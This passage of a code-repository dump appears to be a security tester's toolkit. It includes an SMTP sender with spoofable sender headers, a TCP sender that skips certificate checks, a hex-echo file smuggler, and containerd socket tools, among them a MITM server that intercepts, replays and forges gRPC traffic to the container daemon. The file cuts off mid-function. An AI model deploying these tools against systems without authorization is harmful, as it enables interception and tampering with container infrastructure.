IndexError, AttributeError, TypeError): 187 | print('Required options missing') 188 | print(parser.format_help()) 189 | sys.exit(1) 190 | 191 | if opts.asender: 192 | alt_sender = opts.asender 193 | else: 194 | alt_sender = None 195 | 196 | if opts.bodyfile: 197 | if os.path.exists(opts.bodyfile): 198 | fd = open(opts.bodyfile, 'rb').read() 199 | body=None 200 | else: 201 | print('Provided body file does not exist') 202 | sys.exit(1) 203 | elif opts.body: 204 | fd = None 205 | body = opts.body 206 | else: 207 | print('Provide either body text or body file') 208 | print(parser.format_help()) 209 | sys.exit(1) 210 | 211 | if opts.bodyheaders: 212 | bodyheaders = opts.bodyheaders.replace(', ', ',').split(',') 213 | if opts.bodyfile: 214 | print('Cannot specify both bodyfile and bodyheaders options') 215 | sys.exit(1) 216 | if not opts.raw: 217 | print('Bodyheaders option requires raw option to be enabled') 218 | sys.exit(1) 219 | else: 220 | bodyheaders = None 221 | 222 | if opts.smtpheaders: 223 | smtpheaders = opts.smtpheaders.replace(', ', ',').split(',') 224 | if not opts.raw: 225 | print('Smtpheaders option requires raw option to be enabled') 226 | sys.exit(1) 227 | else: 228 | smtpheaders = None 229 | 230 | 231 | if opts.raw: 232 | sendraw((host, int(port)), sender, ','.join(recipients), subject, nheaders=smtpheaders, bheaders=bodyheaders, textbody=body, afrom=alt_sender, data=fd, debug=opts.debug) 233 | else: 234 | 235 | msg = 
MIMEMultipart() 236 | msg['Message-ID'] = utils.make_msgid() 237 | msg['Subject'] = subject 238 | msg['from'] = sender 239 | msg['To'] = to 240 | 241 | 242 | # giving myself the option to add other encoders later on if desired 243 | encoder = lambda x: x.encode('base64') 244 | encoder.__doc__ = 'base64' 245 | 246 | #charset = 'UTF-8' 247 | charset = 'us-ascii' 248 | 249 | if fd: # bodyfile 250 | maintype, subtype = detect_filetype(opts.bodyfile) 251 | needEncode = False 252 | try: 253 | tdata = fd.encode('ascii') 254 | except: 255 | needEncode = True 256 | if opts.bodyencode or needEncode: 257 | body = MIMEBase(maintype, subtype, charset=charset) 258 | body.set_payload(encoder(fd)) 259 | body.add_header('Content-Transfer-Encoding', encoder.__doc__) 260 | else: 261 | body = MIMEText(tdata, _subtype=subtype, _charset=charset) 262 | msg.attach(body) 263 | elif opts.body: 264 | if opts.bodyencode: 265 | dd = 'text/html' if '<html>' in opts.body else 'text/plain' 266 | maintype, subtype = dd.split('/', 1) 267 | body = MIMEBase(maintype, subtype, charset=charset) 268 | body.set_payload(encoder(opts.body)) 269 | body.add_header('Content-Transfer-Encoding', encoder.__doc__) 270 | msg.attach(body) 271 | else: 272 | msg.preamble = opts.body 273 | 274 | 275 | 276 | if opts.attachments: 277 | # check for option to not detect filetype 278 | for filename in opts.attachments.replace(' ', '').split(','): 279 | attachment = MIMEBase('application', 'octet-stream', charset=charset) 280 | attachment.set_payload(open(filename, 'rb').read()) 281 | attachment.add_header('Content-Transfer-Encoding', encoder.__doc__) 282 | #encoders.encode_base64(attachment) 283 | base_filename = filename.split(os.path.sep)[-1] 284 | attachment.add_header('Content-Disposition', 'attachment', filename=base_filename) 285 | msg.attach(attachment) 286 | 287 | 288 | smtpi = smtplib.SMTP(host, port) 289 | smtpi.sendmail(opts.sender, recipients, msg.as_string()) 290 | smtpi.quit() 291 | -------------------------------------------------------------------------------- /clients/tcp_sender.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import ssl 3 | 4 | def send_receive(host: str, port: int, filename: str, wrap_ssl: bool=False, sni_hostname: str=None, timeout: int=5): 5 | '''Connect to host on given TCP port, with optional ssl wrapping, send data from provided filename, and return response''' 6 | client_socket = socket.socket() 7 | client_socket.settimeout(timeout) 8 | 9 | if wrap_ssl: 10 | #client_socket = ssl.wrap_socket(client_socket, ssl_version=ssl.PROTOCOL_TLSv1_2) 11 | #context = ssl._create_unverified_context(protocol=ssl.PROTOCOL_TLSv1_2) 12 | context = ssl._create_unverified_context() 13 | if sni_hostname: 14 | client_socket = context.wrap_socket(client_socket, server_hostname=sni_hostname) 15 | else: 16 | client_socket = context.wrap_socket(client_socket) 17 | 18 | 19 | client_socket.connect((host, port)) 20 | client_socket.send(open(filename, 'rb').read()) 21 | out = b'' 22 | moar = True 23 | while moar: 24 | try: 25 | d = client_socket.recv(1024) 26 | if len(d) < 1: 27 | moar = False 28 | out += d 29 | except (TimeoutError, ConnectionResetError): 30 | moar = False 31 | except: 32 | break 33 | 34 | client_socket.close() 35 | return out 36 | 37 | -------------------------------------------------------------------------------- /commands/all_strings.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # wrapper for 
srch_strings string search tool from The Sleuth Kit to return strings of all known character types 3 | # extension of code from here http://jessekornblum.livejournal.com/294081.html 4 | 5 | SRCH_STRINGS=/opt/local/bin/srch_strings 6 | FLAGS=-a 7 | 8 | for FILE in "$@" 9 | do 10 | $SRCH_STRINGS $FLAGS -e s "$FILE" 11 | $SRCH_STRINGS $FLAGS -e S "$FILE" 12 | $SRCH_STRINGS $FLAGS -e l "$FILE" 13 | $SRCH_STRINGS $FLAGS -e b "$FILE" 14 | $SRCH_STRINGS $FLAGS -e B "$FILE" 15 | $SRCH_STRINGS $FLAGS -e L "$FILE" 16 | done 17 | -------------------------------------------------------------------------------- /containerd/README.md: -------------------------------------------------------------------------------- 1 | A few tools for understanding and interacting with the containerd socket: 2 | 3 | * echoer.py - reads a binary file and produces an "echo" command that will send the file contents to STDOUT to pipe into other tools in limited toolset environments 4 | * http2_socket_client.py - implementation of an HTTP/2 client in Python that can communicate via a named pipe to facilitate programmatic comms to the containerd socket 5 | * protobuf_parser.py - protobuf parser to allow exploring services defined in .proto files and encoding/decoding of protobuf messages 6 | * socket_grpc_mitm_server.py - allows mitm of traffic between a containerd admin client like ctr and the containerd daemon by creating a listening named pipe that will forward and log all traffic to the actual socket 7 | 8 | 9 | -------------------------------------------------------------------------------- /containerd/echoer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | 4 | if len(sys.argv) < 2: 5 | print('Provide filename to read') 6 | sys.exit(1) 7 | 8 | 9 | try: 10 | data = open(sys.argv[1], 'rb').read() 11 | print('echo -ne "{}"'.format(''.join(["\\x{:02x}".format(a) for a in data]))) 12 | except Exception as e: 13 | print(str(e)) 14 | 15 | 16 | -------------------------------------------------------------------------------- /containerd/http2_socket_client.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import socket 3 | 4 | 5 | import collections 6 | if not hasattr(collections, 'MutableSet'): 7 | import collections.abc 8 | collections.MutableSet = collections.abc.MutableSet 9 | 10 | if not hasattr(collections, 'MutableMapping'): 11 | import collections.abc 12 | collections.MutableMapping = collections.abc.MutableMapping 13 | 14 | 15 | import h2.connection 16 | import h2.events 17 | 18 | 19 | def http2_client(address, method, path, authority, headers, senddata): 20 | max_frame_size = 16384 21 | sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) 22 | sock.connect(address) 23 | 24 | c = h2.connection.H2Connection() 25 | c.initiate_connection() 26 | sock.sendall(c.data_to_send()) 27 | 28 | base_headers = [ 29 | (':method', method), 30 | (':path', path), 31 | (':authority', authority), 32 | (':scheme', 'http'), 33 | ] 34 | if isinstance(headers, dict): 35 | base_headers += [(a[0].lower(), a[1]) for a in headers.items()] 36 | elif isinstance(headers, list): 37 | base_headers += headers 38 | 39 | if senddata and not 'content-length' in [a[0] for a in base_headers]: 40 | base_headers += [('content-length', f'{len(senddata)}')] 41 | 42 | c.send_headers(1, base_headers, end_stream=bool(not senddata)) 43 | if senddata: 44 | segments = [senddata[a:a+max_frame_size] for a in range(0, len(senddata), 
max_frame_size)] 45 | for counter in range(0, len(segments)): 46 | c.send_data(stream_id=1, 47 | data=segments[counter], 48 | end_stream=counter==len(segments)-1) 49 | sock.sendall(c.data_to_send()) 50 | 51 | body = b'' 52 | response_stream_ended = False 53 | while not response_stream_ended: 54 | # read raw data from the socket 55 | data = sock.recv(65536 * 1024) 56 | if not data: 57 | break 58 | 59 | response_headers = [] 60 | response_trailers = [] 61 | # feed raw data into h2, and process resulting events 62 | events = c.receive_data(data) 63 | for event in events: 64 | if isinstance(event, h2.events.ResponseReceived): 65 | response_headers += event.headers 66 | if isinstance(event, h2.events.DataReceived): 67 | # update flow control so the server doesn't starve us 68 | c.acknowledge_received_data(event.flow_controlled_length, event.stream_id) 69 | # more response body data received 70 | body += event.data 71 | if isinstance(event, h2.events.TrailersReceived): 72 | response_trailers += event.headers 73 | if isinstance(event, h2.events.StreamEnded): 74 | # response body completed, let's exit the loop 75 | response_stream_ended = True 76 | break 77 | # send any pending data to the server 78 | sock.sendall(c.data_to_send()) 79 | 80 | # tell the server we are closing the h2 connection 81 | c.close_connection() 82 | sock.sendall(c.data_to_send()) 83 | 84 | # close the socket 85 | sock.close() 86 | return {'body': body, 'headers': response_headers, 'trailers': response_trailers} 87 | 88 | 89 | socket_path = '/tmp/http2' 90 | socket_path = '/run/containerd/containerd.sock' 91 | data = b'\x00\x00\x00\x00\x00' 92 | #response = http2_client(socket_path, 'POST', '/test', 'localhost', {'extra': 'value', 'another': 'one'}, data) 93 | response = http2_client(socket_path, 'POST', '/containerd.services.version.v1.Version/Version', 'localhost', {'content-type': 'application/grpc', 'grpc-accept-encoding': 'gzip'}, data) 94 | print(response) 95 | -------------------------------------------------------------------------------- /containerd/protobuf_parser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from importlib.machinery import SourceFileLoader 4 | import sys 5 | import argparse 6 | import json 7 | import os 8 | 9 | class MyParser(argparse.ArgumentParser): 10 | def error(self, message): 11 | sys.stderr.write('error: %s\n' % message) 12 | self.print_help() 13 | sys.exit(2) 14 | 15 | 16 | def jsonify(value): 17 | if isinstance(value, bool): 18 | return value 19 | if isinstance(value, str): 20 | return value 21 | if isinstance(value, int): 22 | return value 23 | if isinstance(value, list): 24 | return value 25 | if isinstance(value, dict): 26 | return value 27 | if isinstance(value, bytes): 28 | try: 29 | return json.loads(value.decode()) 30 | except: 31 | try: 32 | return value.decode() 33 | except: 34 | return str(value) 35 | if 'RepeatedCompositeContainer' in str(type(value)): 36 | return [{a[0].name: jsonify(a[1]) for a in b.ListFields()} for b in value] 37 | if 'RepeatedScalarContainer' in str(type(value)): 38 | return [jsonify(a) for a in value] 39 | if 'ListFields' in dir(value): 40 | return {a[0].name: jsonify(a[1]) for a in value.ListFields()} 41 | elif 'items' in dir(value): 42 | return dict(value.items()) 43 | return value 44 | 45 | def parse_dependency_package_name(dependencyref): 46 | return '_dot_'.join(dependencyref.name.split('/')).replace('.proto', '') + '__pb2' 47 | 48 | 49 | def parse_field(field): 50 | lookup = 
{getattr(field, a): a for a in dir(field) if a.startswith('CPP')} 51 | complex_type = field.message_type.name if field.message_type else None 52 | cpp_type = lookup.get(field.cpp_type, 'CPPTYPE_NONE').split('_', 1)[-1].lower() 53 | typestring = complex_type if complex_type else cpp_type 54 | return {'type' : typestring } 55 | 56 | 57 | def parse_service(service): 58 | mp = lambda x: {'input_type': x.input_type.name, 'output_type': x.output_type.name} if x else 'None' 59 | methods = {a[0]: mp(a[1]) for a in service.methods_by_name.items()} 60 | return {'methods': methods} 61 | 62 | def parse_type(messagetype): 63 | fields = {a[0]: parse_field(a[1]) for a in messagetype.fields_by_name.items()} 64 | return {'fields': fields} 65 | 66 | 67 | def printstring_messagetypes(messagetypes): 68 | out = '' 69 | for name, messagetype in messagetypes.items(): 70 | out += f'* {name}\n' 71 | for field, fielddata in messagetype.get('fields').items(): 72 | out += ' {} - {}\n'.format(field, fielddata.get('type')) 73 | return out 74 | 75 | 76 | def printstring_messagetypes_complex(messagetypes, dependanttypes): 77 | lookup = {**messagetypes, **dependanttypes} 78 | out = '' 79 | for name, messagetype in messagetypes.items(): 80 | out += f'* {name}\n' 81 | out += ' Fields:\n' 82 | for field, fielddata in messagetype.get('fields').items(): 83 | out += ' {} - {}\n'.format(field, fielddata.get('type')) 84 | 85 | out += '\n Rough JSON example (might need tweaking): \n\n' 86 | fl = len(messagetype.get('fields')) 87 | if fl == 0: 88 | out += '\n==================================\n' 89 | continue 90 | cl = 0 91 | out += '{\n' 92 | for field, fielddata in messagetype.get('fields').items(): 93 | fd = fielddata.get('type') 94 | if fd in lookup: 95 | fd = json.dumps({a[0]:a[1].get('type') for a in lookup[fd].get('fields').items()}) 96 | if fd == 'string': 97 | fd = '"string"' 98 | out += ' "{}": {}'.format(field, fd) 99 | cl +=1 100 | if cl < fl: 101 | out += ',' 102 | out += '\n' 103 | 104 | out += '}\n\n' 105 | out += '==================================\n' 106 | return out 107 | 108 | 109 | def printstring_services(services, package): 110 | out = '' 111 | for name, service in services.items(): 112 | for method, method_details in service.get('methods').items(): 113 | out += f'* /{package}.{name}/{method}\n' 114 | out += ' Input: {}\n'.format(method_details.get('input_type')) 115 | out += ' Output: {}\n'.format(method_details.get('output_type')) 116 | return out 117 | 118 | 119 | 120 | def encode_from_object(data, pb_object, messagetype: str, parent=True, parentobject=None): 121 | kv_assign_types = ['google._upb._message.ScalarMapContainer'] 122 | list_assign_types = ['google._upb._message.RepeatedCompositeContainer', 'google._upb._message.RepeatedScalarContainer'] 123 | o_inst = getattr(pb_object, messagetype)() 124 | field_lookup = {a[0]: parse_field(a[1]).get('type') for a in o_inst.DESCRIPTOR.fields_by_name.items()} 125 | native_types = [a.lower().split('_')[-1] for a in dir([a[1] for a in o_inst.DESCRIPTOR.fields_by_name.items()][0]) if a.startswith('CPP')] 126 | child_types = o_inst.DESCRIPTOR.nested_types_by_name.keys() 127 | if parentobject: 128 | dependant_types = {b : parse_dependency_package_name(a) for a in parentobject.DESCRIPTOR.dependencies for b in a.message_types_by_name.keys()} 129 | primary_types = [a for a in parentobject.DESCRIPTOR.message_types_by_name.keys()] 130 | else: 131 | dependant_types = {b : parse_dependency_package_name(a) for a in protobuf_module.DESCRIPTOR.dependencies for b in 
a.message_types_by_name.keys()} 132 | primary_types = [a for a in protobuf_module.DESCRIPTOR.message_types_by_name.keys()] 133 | 134 | 135 | if isinstance(data, dict): 136 | for key, value in data.items(): 137 | if str(type(getattr(o_inst, key))).split("'")[1] in kv_assign_types: 138 | if isinstance(value, list): 139 | for entry in value: 140 | if 'key' in entry and 'value' in entry: 141 | getattr(o_inst, key)[entry['key']] = entry['value'] 142 | else: 143 | raise Exception(f'Expected "key" and "value" keys in input: {entry}') 144 | elif isinstance(value, dict): 145 | for k, v in value.items(): 146 | getattr(o_inst, key)[k] = v 147 | else: 148 | if 'key' in value and 'value' in value: 149 | getattr(o_inst, key)[value['key']] = value['value'] 150 | else: 151 | raise Exception(f'Expected "key" and "value" keys in input: {value}') 152 | elif str(type(getattr(o_inst, key))).split("'")[1] in list_assign_types: 153 | for entry in value: 154 | if field_lookup.get(key) in child_types: 155 | newentry = encode_from_object(entry, o_inst, field_lookup.get(key), parent=False, parentobject=pb_object) 156 | elif field_lookup.get(key) in primary_types: 157 | newentry = encode_from_object(entry, pb_object, field_lookup.get(key), parent=False) 158 | elif field_lookup.get(key) in dependant_types: 159 | if parentobject: 160 | dependantobject = getattr(parentobject, dependant_types.get(field_lookup.get(key))) 161 | else: 162 | dependantobject = getattr(pb_object, dependant_types.get(field_lookup.get(key))) 163 | newentry = encode_from_object(entry, dependantobject, field_lookup.get(key), parent=False) 164 | elif field_lookup.get(key) in native_types: 165 | if field_lookup.get(key) == 'string' and not isinstance(entry, str): 166 | entry = json.dumps(entry) 167 | newentry = entry 168 | getattr(o_inst, key).append(newentry) 169 | elif field_lookup.get(key) in native_types: 170 | if field_lookup.get(key) == 'string' and not isinstance(value, str): 171 | value = json.dumps(value) 172 | try: 173 | setattr(o_inst, key, value) 174 | except TypeError as e: 175 | if 'expected bytes' in str(e): 176 | setattr(o_inst, key, value.encode()) 177 | elif field_lookup.get(key) in child_types: 178 | newvalue = encode_from_object(value, o_inst, field_lookup.get(key), parent=False, parentobject=pb_object) 179 | if 'CopyFrom' in dir(getattr(o_inst, key)): 180 | getattr(o_inst, key).CopyFrom(newvalue) 181 | elif 'MergeFrom' in dir(getattr(o_inst, key)): 182 | getattr(o_inst, key).MergeFrom(newvalue) 183 | elif field_lookup.get(key) in primary_types: 184 | newvalue = encode_from_object(value, pb_object, field_lookup.get(key), parent=False) 185 | getattr(o_inst, key).CopyFrom(newvalue) 186 | elif field_lookup.get(key) in dependant_types: 187 | if parentobject: 188 | dependantobject = getattr(parentobject, dependant_types.get(field_lookup.get(key))) 189 | else: 190 | dependantobject = getattr(pb_object, dependant_types.get(field_lookup.get(key))) 191 | newvalue = encode_from_object(value, dependantobject, field_lookup.get(key), parent=False) 192 | getattr(o_inst, key).CopyFrom(newvalue) 193 | if isinstance(data, list): 194 | 195 | o_inst = data 196 | 197 | if parent: 198 | return o_inst.SerializeToString() 199 | else: 200 | return o_inst 201 | 202 | 203 | 204 | if __name__ == "__main__": 205 | parser = MyParser() 206 | parser.epilog = 'Generate Python module to use for decoding definitions using the protoc tool like so: protoc --python_out=. <filename.proto>
' 207 | parser.description = 'Protobuf decoder using Python modules generated using the protoc command line tool' 208 | parser.add_argument('-m', '--module', type=str, required=True, help='protoc generated Python module file <*_pb2.py>. REQUIRED.') 209 | parser.add_argument('-d', '--data', type=str, default=None, help='Data file to parse as gRPC protobuf content') 210 | parser.add_argument('-t', '--type', type=str, default=None, help='Type definition from the protobuf file to use when parsing') 211 | parser.add_argument('-o', '--output', type=str, default=None, help='Output file. STDOUT will be used if not specified') 212 | parser.add_argument('-i', '--input', type=str, default=None, help='Input file in JSON format') 213 | parser.add_argument('-j', '--jsonout', action='store_true', help='Attempt to output in JSON format') 214 | parser.add_argument('-x', '--skip_indent', action='store_true', help='Don\'t indent JSON output') 215 | args = parser.parse_args() 216 | 217 | 218 | 219 | try: 220 | base = os.path.split(args.module)[-1] 221 | protobuf_module = SourceFileLoader('.'.join(base.split('.')[:-1]), args.module).load_module() 222 | except Exception as e: 223 | print(str(e)) 224 | sys.exit(1) 225 | 226 | message_types = [a for a in protobuf_module.DESCRIPTOR.message_types_by_name] 227 | allowed = ','.join(message_types) 228 | 229 | if args.data and not args.type: 230 | print('Provide a type for parsing of the response data file using -t') 231 | print(f'Available types include: {allowed}') 232 | sys.exit(1) 233 | 234 | 235 | if args.type and not args.type in message_types: 236 | print(f'Specified type {args.type} is not in allowed list: {allowed}') 237 | 238 | 239 | if args.output and args.input: 240 | if not args.type: 241 | print(f'No message type specified, select from the following list: {allowed}') 242 | sys.exit(1) 243 | try: 244 | jsondata = json.loads(open(args.input).read()) 245 | encoded_data = encode_from_object(jsondata, protobuf_module, args.type) 246 | # add the gRPC Length-Prefixed-Message header: a compressed-flag byte followed by a 4 byte big-endian length (writing the length as 5 BE bytes leaves the flag as 0 for messages under 4GiB) 247 | header = int(len(encoded_data)).to_bytes(5, 'big') 248 | open(args.output, 'wb').write(header + encoded_data) 249 | print(f'Written to {args.output}') 250 | sys.exit(0) 251 | except Exception as e: 252 | print(str(e)) 253 | sys.exit(1) 254 | 255 | 256 | if args.data and args.type: 257 | try: 258 | data = open(args.data, 'rb').read() 259 | obj = getattr(protobuf_module, args.type)() 260 | # strip off gRPC Length-Prefixed-Message header and hope message not bigger than ~ 1099511627775 261 | obj.ParseFromString(data[5:]) 262 | if args.jsonout: 263 | if args.skip_indent: 264 | outputcontent = json.dumps({a[0].name: jsonify(a[1]) for a in obj.ListFields()}) 265 | else: 266 | outputcontent = json.dumps({a[0].name: jsonify(a[1]) for a in obj.ListFields()}, indent=4) 267 | else: 268 | outputcontent = str(obj) 269 | if args.output: 270 | open(args.output, 'w').write(outputcontent) 271 | else: 272 | print(outputcontent) 273 | 274 | sys.exit(0) 275 | except Exception as e: 276 | print(str(e)) 277 | sys.exit(1) 278 | 279 | else: 280 | package = protobuf_module.DESCRIPTOR.package 281 | deps = [a.name for a in protobuf_module.DESCRIPTOR.dependencies] 282 | message_types = {a[0]: parse_type(a[1]) for a in protobuf_module.DESCRIPTOR.message_types_by_name.items()} 283 | dependant_types = {b[0]: parse_type(b[1]) for a in protobuf_module.DESCRIPTOR.dependencies for b in a.message_types_by_name.items()} 284 | services = {a[0]: parse_service(a[1]) for a 
in protobuf_module.DESCRIPTOR.services_by_name.items()} 285 | #print('Dependencies:\n' + '\n'.join(['* ' + a for a in deps])) 286 | print('Services:\n' + printstring_services(services, package)) 287 | print('==================================') 288 | #print('\nMessage Types:\n' + printstring_messagetypes(message_types)) 289 | print('\nDependant Message Types:\n' + printstring_messagetypes(dependant_types)) 290 | print('==================================') 291 | print('\nMessage Types:\n' + printstring_messagetypes_complex(message_types, dependant_types)) 292 | 293 | 294 | 295 | 296 | 297 | 298 | -------------------------------------------------------------------------------- /containerd/socket_grpc_mitm_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import socket 3 | import json 4 | import os 5 | import sys 6 | 7 | # installing hyper can bork h2 so we need to do this monkey patching before h2 loads 8 | import collections 9 | if not hasattr(collections, 'MutableSet'): 10 | import collections.abc 11 | collections.MutableSet = collections.abc.MutableSet 12 | 13 | if not hasattr(collections, 'MutableMapping'): 14 | import collections.abc 15 | collections.MutableMapping = collections.abc.MutableMapping 16 | 17 | import h2.connection 18 | import h2.events 19 | import h2.config 20 | 21 | if not len(sys.argv) > 1: 22 | print('Provide socket path to listen on as parameter 1') 23 | sys.exit(1) 24 | 25 | socket_path = sys.argv[1] 26 | 27 | 28 | 29 | 30 | max_frame_size = 16384 31 | 32 | # configure whether we try and replay received requests 33 | # TODO expose all of this to command line config 34 | replay = { 35 | 'replay_requests' : True, 36 | 'destination': '/run/containerd/containerd.sock', 37 | 'verify_grpc': False 38 | } 39 | 40 | # basic config for responding to given requests 41 | url_map = { 42 | '/containerd.services.introspection.v1.Introspection/Server': {'filecontent': '/tmp/int', 'content-type': 'application/grpc'}, 43 | '/containerd.services.containers.v1.Containers/Get': {'filecontent': '/tmp/cg', 'content-type': 'application/grpc'}, 44 | '/containerd.services.tasks.v1.Tasks/Get': {'filecontent': '/tmp/tg', 'content-type': 'application/grpc'}, 45 | '/containerd.services.tasks.v1.Tasks/Exec': {'filecontent': '/tmp/empty', 'content-type': 'application/grpc'}, 46 | '/containerd.services.images.v1.Images/Get': {'filecontent': '/tmp/imagegetresponse.bin', 'content-type': 'application/grpc'}, 47 | '/containerd.services.namespaces.v1.Namespaces/Get': {'filecontent': '/tmp/namespacegetresponse.bin', 'content-type': 'application/grpc'}, 48 | '/containerd.services.content.v1.Content/Info': [ 49 | {'data': b'k8s.io', 'filecontent': '/tmp/empty', 'content-type': 'application/grpc', 'trailers': [('grpc-status', '3'), ('grpc-message', '"k8s.io" failed validation')]}, 50 | {'data': b'sha256', 'filecontent': '/tmp/contentinfo2.bin', 'content-type': 'application/grpc'} 51 | ], 52 | '/containerd.services.content.v1.Content/Read': {'filecontent': '/tmp/readresponse.bin', 'content-type': 'application/grpc'}, 53 | } 54 | 55 | 56 | # remove the socket file if it already exists 57 | try: 58 | os.unlink(socket_path) 59 | except OSError: 60 | if os.path.exists(socket_path): 61 | raise 62 | 63 | 64 | def build_curl_command(primitives, headers, data, socket_name=replay['destination'], sudo=True): 65 | data_pipe = '' 66 | pipe_trail = '' 67 | sudo_ins = '' 68 | url = primitives.get('url', None) 69 | method = primitives.get('method', None) 70 | 
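# render each extra header as a repeated curl -H option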
    c_headers = ' '.join([' -H "{}: {}"'.format(a[0], a[1]) for a in headers.items()])
71 |     if data:
72 |         data_pipe = 'echo -ne "{}" | '.format(''.join(["\\x{:02x}".format(a) for a in data]))
73 |         pipe_trail = '--data-binary @- --output FILENAME'
74 |     if socket_name:
75 |         socket_addr = f'--unix-socket {socket_name}'
76 |     if sudo:
77 |         sudo_ins = 'sudo '
78 |     if url and method:
79 |         return f'{data_pipe}{sudo_ins}curl -s -v --http2-prior-knowledge {socket_addr} -X {method} {c_headers} {url} {pipe_trail}'
80 |     else:
81 |         return 'Could not create curl command'
82 |
83 |
84 | def parse_headers(event):
85 |     return {a[0]:a[1] for a in event.headers if not a[0].startswith(':')}
86 |
87 | def parse_primitives(event):
88 |     prim = {a[0]:a[1] for a in event.headers if a[0].startswith(':')}
89 |     try:
90 |         url = '{}://{}{}'.format(prim[':scheme'], prim[':authority'], prim[':path'])
91 |         return {'url' : url, 'method': prim[':method']}
92 |     except Exception as e:
93 |         print(f'Exception parsing primitives from event: {str(e)}')
94 |         return {}
95 |
96 |
97 | def send_response(conn, event, data=b''):
98 |     stream_id = event.stream_id
99 |     event_headers = dict(event.headers)
100 |     path = event_headers.get(':path')
101 |     method = event_headers.get(':method')
102 |     content_type = 'application/json'
103 |     end_stream = True
104 |
105 |     response_data = json.dumps(event_headers).encode('utf-8')
106 |     mapping = ''
107 |     replay_response = {}
108 |     if replay.get('replay_requests', False):
109 |         extra_headers = {a[0]: a[1] for a in event_headers.items() if not a[0].startswith(':')}
110 |         try:
111 |             print('Trying to replay request...')
112 |             #import ipdb
113 |             #ipdb.set_trace()
114 |             replay_message = True
115 |             if replay.get('verify_grpc'):
116 |                 if int.from_bytes(data[:5], 'big') != len(data) - 5:
117 |                     replay_message = False
118 |                     print('Message failed gRPC verification, will not replay')
119 |
120 |             if replay_message:
121 |                 replay_response = http2_client(replay.get('destination'), method, path, event_headers.get(':authority'), extra_headers, data)
122 |                 print(f'Replay successful, response: {str(replay_response)}')
123 |         except Exception as e:
124 |             print(f'Error when trying to replay request: {str(e)}')
125 |     elif path in url_map:
126 |         if isinstance(url_map[path], dict):
127 |             mapping = url_map[path]
128 |         elif isinstance(url_map[path], list):
129 |             for mapentry in url_map[path]:
130 |                 if mapentry.get('data') in data:
131 |                     print('matched entry')
132 |                     print(mapentry.get('data'))
133 |                     mapping = mapentry
134 |
135 |     if mapping:
136 |         content_type = mapping.get('content-type')
137 |         try:
138 |             fn = mapping.get('filecontent')
139 |             response_data = open(fn, 'rb').read()
140 |             print(f'Sending content from file {fn} in response')
141 |         except Exception:
142 |             pass
143 |
144 |     trailers = []
145 |     if content_type == 'application/grpc':
146 |         end_stream = False
147 |         if 'trailers' in mapping:
148 |             trailers = mapping['trailers']
149 |         else:
150 |             trailers = [('grpc-status', '0'),('grpc-message', '')]
151 |
152 |     headers = [
153 |         (':status', '200'),
154 |         ('server', 'debug-http2-server/1.0'),
155 |         ('content-length', str(len(response_data))),
156 |         ('content-type', content_type),
157 |     ]
158 |
159 |
160 |
161 |     if replay_response:
162 |         if replay_response.get('headers'):
163 |             headers = replay_response.get('headers')
164 |             #if 'content-type' in [a[0] for a in headers]:
165 |             #    content_type = [a[1] for a in headers if a[0] == 'content-type'][0]
166 |         if replay_response.get('trailers'):
167 |             trailers =
replay_response.get('trailers') 168 | end_stream = False 169 | if replay_response.get('body'): 170 | response_data = replay_response.get('body') 171 | 172 | 173 | 174 | conn.send_headers( 175 | stream_id=stream_id, 176 | headers=headers, 177 | ) 178 | 179 | segments = [response_data[a:a+max_frame_size] for a in range(0, len(response_data), max_frame_size)] 180 | for counter in range(0, len(segments)): 181 | conn.send_data( 182 | stream_id=stream_id, 183 | data=segments[counter], 184 | end_stream=(counter==len(segments)-1) and end_stream 185 | ) 186 | 187 | if trailers: 188 | conn.send_headers( 189 | stream_id=stream_id, 190 | headers=trailers, 191 | end_stream=True 192 | ) 193 | 194 | 195 | 196 | def http2_client(address, method, path, authority, headers, senddata): 197 | max_frame_size = 16384 198 | sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) 199 | sock.connect(address) 200 | 201 | c = h2.connection.H2Connection() 202 | c.initiate_connection() 203 | sock.sendall(c.data_to_send()) 204 | 205 | base_headers = [ 206 | (':method', method), 207 | (':path', path), 208 | (':authority', authority), 209 | (':scheme', 'http'), 210 | ] 211 | if isinstance(headers, dict): 212 | base_headers += [(a[0].lower(), a[1]) for a in headers.items()] 213 | elif isinstance(headers, list): 214 | base_headers += headers 215 | 216 | if senddata and not 'content-length' in [a[0] for a in base_headers]: 217 | base_headers += [('content-length', f'{len(senddata)}')] 218 | 219 | c.send_headers(1, base_headers, end_stream=bool(not senddata)) 220 | if senddata: 221 | segments = [senddata[a:a+max_frame_size] for a in range(0, len(senddata), max_frame_size)] 222 | for counter in range(0, len(segments)): 223 | c.send_data(stream_id=1, 224 | data=segments[counter], 225 | end_stream=counter==len(segments)-1) 226 | sock.sendall(c.data_to_send()) 227 | 228 | body = b'' 229 | response_stream_ended = False 230 | while not response_stream_ended: 231 | # read raw data from the socket 232 | data = sock.recv(65536 * 1024) 233 | if not data: 234 | break 235 | 236 | response_headers = [] 237 | response_trailers = [] 238 | # feed raw data into h2, and process resulting events 239 | events = c.receive_data(data) 240 | for event in events: 241 | if isinstance(event, h2.events.ResponseReceived): 242 | response_headers += event.headers 243 | if isinstance(event, h2.events.DataReceived): 244 | # update flow control so the server doesn't starve us 245 | c.acknowledge_received_data(event.flow_controlled_length, event.stream_id) 246 | # more response body data received 247 | body += event.data 248 | if isinstance(event, h2.events.TrailersReceived): 249 | response_trailers += event.headers 250 | if isinstance(event, h2.events.StreamEnded): 251 | # response body completed, let's exit the loop 252 | response_stream_ended = True 253 | break 254 | # send any pending data to the server 255 | sock.sendall(c.data_to_send()) 256 | 257 | # tell the server we are closing the h2 connection 258 | c.close_connection() 259 | sock.sendall(c.data_to_send()) 260 | 261 | # close the socket 262 | sock.close() 263 | return {'body': body, 'headers': response_headers, 'trailers': response_trailers} 264 | 265 | 266 | 267 | 268 | def handle(sock): 269 | received_info = {} 270 | #received_data = None 271 | config = h2.config.H2Configuration(client_side=False) 272 | conn = h2.connection.H2Connection(config=config) 273 | conn.initiate_connection() 274 | sock.sendall(conn.data_to_send()) 275 | 276 | 277 | while True: 278 | try: 279 | data = sock.recv(65536 * 
1024)
280 |             print('===================================')
281 |
